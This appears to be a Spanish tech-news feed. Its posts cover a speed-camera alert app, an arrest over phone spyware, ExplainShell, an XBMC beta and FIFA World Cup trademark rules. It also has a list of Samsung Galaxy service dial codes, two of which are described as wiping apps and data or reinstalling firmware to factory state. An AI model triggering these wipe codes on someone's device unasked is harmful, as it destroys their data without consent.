Antes de salir de vacaciones hay que hacer chequeos de todo tipo y, por supuesto, instalar un avisador de radares en carretera para Android es una de esas pequeñas tareas que nos puede ahorrar algunos problemas. Radar Beep es la aplicación que buscas, un avisador de radares realmente completo y perfectamente legal que podrás llevar siempre avisándote de cuando debes moderar tu velocidad y conducción.

Radar Beep 1 253x450 Radar Beep

Los radares de carretera están ubicados en lugares públicos, es decir, existe un listado que se puede consultar por parte de cualquier ciudadano y esto es lo que hace Radar Beep, mantiene su base de datos de radares actualizada en todo momento para que sepamos dónde están activos los radares y dónde suele ubicarse los radares móviles para avisarnos. Recibiremos una señal antes de acercarnos a radares fijos móviles, tramos peligrosos, semáforos, avisos de peligros en la carretera, puntos negros y controles habituales de policía, además nos avisa de la distancia que nos falta hasta llegar al radar así como la velocidad a la que circulamos para que podamos corregirla si es necesario. Todo esto gracias al uso del GPS integrado en los móviles y tablets Android. Una de las funciones que podemos configurar son los avisos graduales que nos recuerdan la distancia hasta los radares teniendo en cuenta nuestra velocidad, evitando cambios bruscos en nuestra marcha que pueden resultar peligrosos.

Radar Beep 4 450x253 Radar Beep

Mientras utilicemos Radar Beep podemos ver en nuestra pantalla un visor similar al GPS en el que se nos informará de la velocidad de la vía por la que estamos circulando así como de la dirección y velocidad de nuestro coche en la ubicación exacta en la que nos encontramos y los radares más cercanos a nosotros.

Por otra parte, en sucesivas actualizaciones Radar Beep ha mejorado su integración en el coche de forma exponencial, ahora puede activarse al detectar el bluetooth del coche y próximamente hará lo mismo con las etiquetas NFC y los detectores NFC que integran muchos smartphones Android. Esto es genial porque sólo tendremos que acordarnos de instalar Radar Beep en nuestro smartphone Android, configurarlo y olvidarnos hasta que nos avise.

Radar Beep 2 253x450 Radar Beep

Además, la aplicación está disponible en multitud de idiomas como Alemán, Árabe, Catalán, Chino, Coreano, Español, Francés, Hindi, Inglés, Italiano, Japonés, Polaco, Portugués, Rumano, Ruso, o Turco y en casi todas ellas está disponible así mismo la voz que nos avisa de los radares. Por supuesto, España es uno de sus puntos fuertes pero Radar Beep funciona en múltiples países, algo genial si queremos viajar por Europa, aunque tendremos que descargar la base de datos de cada país que queramos visitar.

Radar Beep 3 450x253 Radar Beep

Si vas a viajar un buen GPS y una app como Radar Beep son imprescindibles para no alcanzar nunca velocidades superiores a las permitidas y mantener siempre la seguridad en la carretera, asegurándonos de cumplir escrupulosamente las normas de circulación. Gracias a Radar Beep sabremos en todo momento la velocidad máxima de cada vía y la situación de los radares y controles directamente en nuestro Android, una ayuda para asegurarnos que las vacaciones no nos cuestan una multa.

Radar Beep en Descargar Android - Las Mejores Apps Para Android Gratis.

20 May 11:43

Detenido por instalar una aplicación en el móvil de su novia para espiarla

La Guardia Civil de Burgos ha detenido a un joven de 23 años, D.H.P, como supuesto autor de un delito de descubrimiento y revelación de secretos --delito contra la intimidad-- relacionado con la instalación en el móvil de su pareja de una aplicación con el propósito de mantenerla controlada, según informaron a Europa Press fuentes de la Subdelegación del Gobierno.

La detención hoy conocida se produjo este domingo en una localidad del Alfoz por hechos ocurridos días atrás, cuando el citado joven pidió el móvil a su pareja bajo el pretexto de pretender actualizárselo. Sin embargo, D.H.P. aprovechó para instalar una aplicación espía con la que controlaba, en tiempo y lugar, la posición del terminal telefónico, así como las llamadas y mensajes de su propietaria.

La persona perjudicada sospechó cuando empezó a notar que la batería del móvil duraba pocas horas, ante lo cual optó por denunciar los hechos.

En el curso de las pesquisas, guardias civiles del Puesto Principal de Alfoz de Burgos localizaron al supuesto autor, quien admitió los hechos y por los que fue finalmente detenido.

El teléfono móvil del 'espía' ha sido intervenido para su estudio por parte de personal del Equipo de Investigación Tecnológica (EDITE) de la U.O.P.J. de Burgos.

Las diligencias instruidas han sido entregadas en el Juzgado de Instrucción número 1 de Burgos.

http://www.publico.es/actualidad/521729/detenido-por-instalar-una-aplicacion-en-el-movil-de-su-novia-para-espiarla
20 May 11:22

ExplainShell o dígame qué significa este comando oiga

by noreply@blogger.com (Vicente Motos)
ExplainShell es una base de datos online que te permite encontrar información detallada sobre casi todos los comandos principales de Linux existentes.

Básicamente funciona analizando las típicas páginas de manual (manpages) que utilizan los sistemas operativos basados ​​en Unix para encontrar el texto de ayuda relevante asociado con un comando (y sus argumentos incluidos, si los hubiera). Para ello, ExplainShell mantiene un archivo de todo el repositorio de páginas de manuales de Ubuntu. Todo lo que tienes que hacer es buscar una órden concreta y ExplainShell devolverá inmediatamente el texto o textos de ayuda correspondientes.

http://explainshell.com/

Explainshell esta principalmente escrito en Python, pero también utiliza NLTK (para extraer las partes interesantes de los manuales), un poco de d3.js (para la parte gráfica) y Flask (como framework de Python). Su autor es Idan Kamara que finalmente ha publicado el código bajo licencia GPL en GitHub, con el cual podremos utilizar nuestro propio servidor de forma local.
20 May 11:03

XBMC 13.1 GOTHAM Beta 2

by Laser
 Ahora que muchos tienen instalada la  versión GOTHAM también se van sabiendo  nuevos "bugs" que no fueron detectados en un primer momento. De todas formas, gracias a la gente que lo va notificando estos se van solucionando progresivamente con la llegada de nuevas Betas.

XBMC 13.1 GOTHAM Beta 2

Esta Beta 2 de la versión 13.1 contiene las siguientes correcciones :

· Corregido ciertos errores en la reproducción de PVR.
· Corregido los "pop-ups" de nuevos complementos en el servicio UPnP (solo pasa con algunas televisiones).
· Corregido el modo "Airplay", se han encontrado errores inesperados.




- DESCARGAS -

· Android ( ARM - x86 )
· Linux
· MAC ( OSX - OSX x86-64 )
· iOS


* Recordar que los usuarios con Windows XP ya no podrán utilizar esta versión al no disponer de soporte para tal sistema.
 
 
20 May 11:00

Los códigos secretos de Samsung más importantes

by Joan Carballo

Nuestros teléfonos Samsung Galaxy son pequeños ordenadores y con tantos cientos de piezas, chips y componentes internos es normal que de vez en cuando alguno tenga fallos y provoque errores en los terminales, estas situaciones son minimizables (cuanta más calidad y menos fabricación estilo móvil chino barato, mejor) sin embargo, es imposible acabar con ellos. Ni siquiera con los mejores controles de calidad empresas como Samsung están libres por eso los técnicos necesitan alguna forma de verificar el estado de algunos componentes y funciones. Esto se hace mediante los códigos secretos de Samsung.

Samsung 450x263 Los códigos secretos de Samsung más importantes

Los códigos secretos de Samsung Galaxy se aplican al terminal para que nos muestre en pantalla una serie de datos verificando así el estado de cada componente o función y para ello hay que marcarlos como si de una llamada se tratara, son código simples pero muy potentes e importantes y en algunos casos su uso puede ser catastrófico si no sabemos qué estamos haciendo. Por eso Descargar Android no se hace responsable de lo que le pueda ocurrir a tu móvil.

Los códigos de Samsung Galaxy a los que hemos tenido acceso se han publicado en Reddit por parte de un usuario que ha sido capaz de obtenerlos, recordemos que están pensados para su uso por parte de técnicos, no suelen ser códigos públicos, y los puedes ver aquí junto a una descripción de para qué sirven:

Código a marcar Descripción
*#*#4636#*#* Mostrará información acerca de la batería del teléfono y de uso.
*#*#7780#*#* Borra las aplicaciones instaladas y sus datos y devuelve el teléfono a su estado “de fabrica”
*2767*3855# Restaura por completo tu dispositivo a sus valores de fábrica instalando de nuevo el firmware.
*#*#34971539#*#* Muestra información sobre la cámara.
*#*#7594#*#* Activa el apagado rápido al pulsar el botón de Off.
*#*#273283*255*663282*#*#* Realiza una copia de seguridad de los archivos multimedia
*#*#197328640#*#* Habilita el modo test
*#*#232339#*#* OR *#*#526#*#* Realiza un test de la conexión WiFi.
*#*#232338#*#* Muestra la dirección MAC.
*#*#1472365#*#* Realiza un test del módulo de GPS.
*#*#1575#*#* Realiza otro tipo de test al módulo de GPS.
*#*#0283#*#* Realiza un test sobre los paquetes de datos.
*#*#0*#*#* Realiza un test de la pantalla.
*#*#0673#*#* o *#*#0289#*#* Realiza un test del audio.
*#*#0842#*#* Realiza un test de vibración y flash.
*#*#2663#*#* Muestra la versión de la pantalla táctil del dispositivo.
*#*#2664#*#* Realiza un test de la pantalla táctil del dispositivo.
*#*#0588#*#* Realiza un test del sensor de proximidad del dispositivo.
*#*#3264#*#* Muestra la versión de la memoria RAM.
*#*#232331#*#* Realiza un test del módulo de bluetooth.
*#*#7262626#*#* Realiza un test sobre la calidad de la señal recibida/cobertura.
*#*#232337#*# Muestra la dirección bluetooth del dispositivo. Similar a la MAC.
*#*#8255#*#* Monitoriza Google Talk.
*#*#4986*2650468#*#* Información sobre PDA, Phone, Hardware y RF Call Date.
*#*#1234#*#* Información sobre PDA y Phone firmware.
*#*#1111#*#* Información del software de FTA.
*#*#2222#*#* Información del hardware de FTA.
*#*#44336#*#* Muestra la fecha de compilación de nuestra ROM.
*#06# Muestra el IMEI de Samsung Galaxy.
*#*#8351#*#* Habilita el modo de marcación por voz
*#*#8350#*#* Deshabilita el modo de marcación por voz
##778 (y llamar) Muestra el menú EPST
*#*#4636#*#* Información del teléfono, la batería, historial de batería y estadísticas de uso

Gracias a estos códigos secretos de Samsung Galaxy podremos obtener muchísima información detallada para saber el estado de muchos de los componentes de nuestro teléfono.

samsung codigos 2 450x286 Los códigos secretos de Samsung más importantes

Si conoces más códigos no olvides dejarlos en los comentarios junto con una descripción de para qué los podemos utilizar en nuestros smartphones Android.

Los códigos secretos de Samsung más importantes en Descargar Android - Las Mejores Apps Para Android Gratis.

19 May 08:05

Prohibido decir "Mundial de fútbol"

by María González

Mundial de Fútbol

¿Qué tienen en común "Brasil 2014", "Mundial de Fútbol" y "FIFA World Cup"? Todos estos términos forman parte de una lista de nombres que la FIFA ha registrado y cuyo uso comercial está sujeto al permiso del máximo organismo internacional del fútbol. ¿En qué se traduce esto? En que si tienes una tienda online, no puedes utilizar ni el logo ni esos eslóganes en promociones. En que, además, si alguien de tu familia tiene un bar, no puede usar el póster ni otros elementos para decorar. ¿Y si quieres hacer una web sobre el evento? Si vas a darle un uso comercial, cuidado con los materiales que vas a utilizar.

Ese privilegio sólo está reservado para los patrocinadores oficiales. "FIFA no sería capaz de organizar el torneo sin la importante colaboración de sus afiliados comerciales" y, según explican, por ello defienden un uso tan restringido de todas las marcas asociadas al Mundial de Fútbol. Sólo sus colaboradores, previo pago, pueden valirse de ellas. En un documento oficial explican en detalle qué se puede hacer y qué no, como pasamos a repasar a continuación:

Las palabras oficiales "prohibidas"

  • 2014 FIFA World Cup Brazil
  • 2014 FIFA World Cup
  • FIFA World Cup
  • FIFA
  • World Cup
  • 2014 World Cup
  • World Cup 2014
  • Brazil 2014
  • 2014 Brazil
  • Football World Cup
  • Soccer World Cup
  • Copa 2014
  • Copa do Mundo
  • Mundial 2014
  • Mundial de Futebol Brasil 2014
  • Copa do Mundo 2014
  • Rio 2014 (junto al resto de sedes)

Como advierte la FIFA, esta lista no se trata de un listado completo de todas las palabras que han registrado y cuyo uso está restringido. En función del país en el que nos encontremos también existirán otras frases protegidas. Por ejemplo, "Mundial de fútbol" en España y cualquiera de las traducciones de las anteriormente mencionadas.

Otros materiales que no se pueden usar en publicidad

Prohibido usar el logo y su mascota

  • El emblema oficial
  • La mascota oficial
  • El slogal oficial ("All in one rhythm")
  • Póster oficial
  • Imágenes del trofeo
  • Logo de la FIFA

Lo que no se puede hacer

Fifa World Cup Guidelines

  • Realizar promociones o anuncios de cualquier tipo que utilicen cualquiera de los materiales especificados anteriormente.
  • Sortear entradas para los partidos a modo de concurso.
  • Subastar entradas online.
  • Imprimir un calendario de partidos con fines comerciales.
  • Utilizar una marca registrada como parte de un nombre de un negocio (por ej. Brasil 2014 Hotel Guide)
  • Utilizar una marca registrada en merchandising (por ej. una camiseta con Brasil y el año 2014)
  • Decoraciones en bares y restaurantes con el logo del Mundial, de la FIFA o cualquier marca registrada.
  • Dominios comerciales que llevan una marca antes del nombre del dominio (por ej. www.worldcup.travel.company.com)
  • Usar el logo cerca de otro logo distinto en una web de Internet.
  • Usar los materiales protegidos (por ej. el logo de la FIFA) con enlace a la web oficial.
  • Utilizar las marcas registradas en SMS, MMS u otros servicios móviles.
  • Utilizar las palabras protegidas y los gráficos para aplicaciones móviles.
  • Utilizar los materiales protegidos en las redes sociales.
  • Organizar un visionado público patrocinado por una marca.
Brasil 2014Esta camiseta estaría infringiendo los derechos de autor de la FIFA por usar "Brasil 2014"

Lo que se puede hacer

  • Realizar promociones o anuncios con términos genéricos que no produzcan una "asociación no autorizada" a la FIFA.
  • Uso de los materiales oficiales para fines periodísticos.
  • Imprimir un calendario de partidos genérico y sin fines comerciales.
  • Utilizar un término genérico relacionado con el fútbol o con Brasil como parte de un nombre de un negocio.
  • Utilizar términos generales para crear merchandising (por ej. una camiseta con Brasil y su bandera).
  • Decoraciones en bares y restaurantes con material generalista asociado al fútbol (banderas de Brasil, balones, etc.)
  • Dominios comerciales que llevan una marca después del nombre del dominio (por ej. www.travel-company.com/worldcuptravelinfo.htm)
Marcas Brasil 2014Las marcas que quieran aprovechar el Mundial, obligadas a buscar alternativas

Se conoce como "ambush marketing" o "marketing parasitario" a las acciones en las que un determinado producto se asocia a un evento sin pagar por ser uno de sus patrocinadores y así poder aprovechar su tirón.

¿Cuándo termina el uso personal y comienza el comercial?

Desde Genbeta hemos hablado con el responsable de las redes sociales de una compañía multinacional. Tanto a él como al resto de su departamento, la marca les instó a seguir el manual de la FIFA al dedillo. ¿Qué significa esto? Que no sólo no pueden organizar sorteos ni promociones (algo más que común en estos casos), sino que pueden hacer ninguna mención al "Mundial" en sí. O usan generalidades como "fútbol" o similares, o directamente no podrán referirse al evento.

La FIFA quiere evitar el "ambush marketing" o "marketing parasitario" (las acciones en las que un determinado producto se asocia a un evento sin pagar por ser uno de sus patrocinadores y así poder aprovechar su tirón) aunque en ocasiones parezcan llegar demasiado lejos. En 2010, por ejemplo, denunciaron a una aerolínea sudafricana de bajo coste por usar el lema "Aerolínea no oficial del Ya-Sabes-Qué", al mismo tiempo que incluían una fotografía de un estadio. Tan genéricos quisieron ser que para la FIFA se veía claramente la asociación con su evento.

La gran pregunta aquí es cuándo termina el uso personal para pasar al comercial. Está claro que si alguien lleva las redes sociales de una marca se trata de un fin comercial, o incluso en los anuncios que acabamos de mencionar, pero en otras situaciones la línea no está tan clara. ¿Si alguien twittea en directo los partidos por Twitter e introduce algunos tweets con publicidad? ¿Y si alguien posee una página web con publicidad, se considera uso comercial? ¿Llegará el momento en el que prohibirán a la gente utilizar estos términos en sus páginas, blogs y redes sociales sin pagar por ello?

Imagen | José Roitberg
Enlace | Documento oficial de la FIFA

-
La noticia Prohibido decir "Mundial de fútbol" fue publicada originalmente en Genbeta por María González.